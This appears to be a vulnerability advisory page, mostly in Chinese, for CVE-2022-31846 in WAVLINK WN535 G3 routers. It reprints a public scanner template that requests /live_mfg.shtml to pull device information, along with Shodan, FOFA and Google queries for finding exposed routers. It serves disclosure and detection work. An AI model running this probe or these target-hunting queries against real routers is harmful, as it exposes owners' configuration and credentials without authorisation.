CVE-2022-31846: WAVLINK WN535 G3 - Information Disclosure

日期: 2025-08-01 | 影响软件: WAVLINK WN535 G3 | POC: 已公开

漏洞描述

WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2022-31846

info:
  name: WAVLINK WN535 G3 - Information Disclosure
  author: arafatansari
  severity: high
  description: |
    WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as router configuration settings and user credentials.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
  reference:
    - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__live_mfg.md
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31846
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-31846
    cwe-id: CWE-668
    epss-score: 0.38199
    epss-percentile: 0.97133
    cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wn535g3_firmware
    shodan-query:
      - http.html:"Wavlink"
      - http.html:"wavlink"
      - http.title:"wi-fi app login"
    fofa-query:
      - title="wi-fi app login"
      - body="wavlink"
    google-query: intitle:"wi-fi app login"
  tags: cve,cve2022,wavlink,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/live_mfg.shtml"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Model='
          - 'DefaultIP='
          - 'LOGO1='
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ec422fcc935fde0a929216eb4ba64e55ce68fe3eec725079a2846b4f6542730d022100ee0d096e2c57b22ec5f04e4f13b1459a59706b6f33074d4dd86af7ccff3d1378:922c64590222798bb761d5b6d8e72950

相关漏洞推荐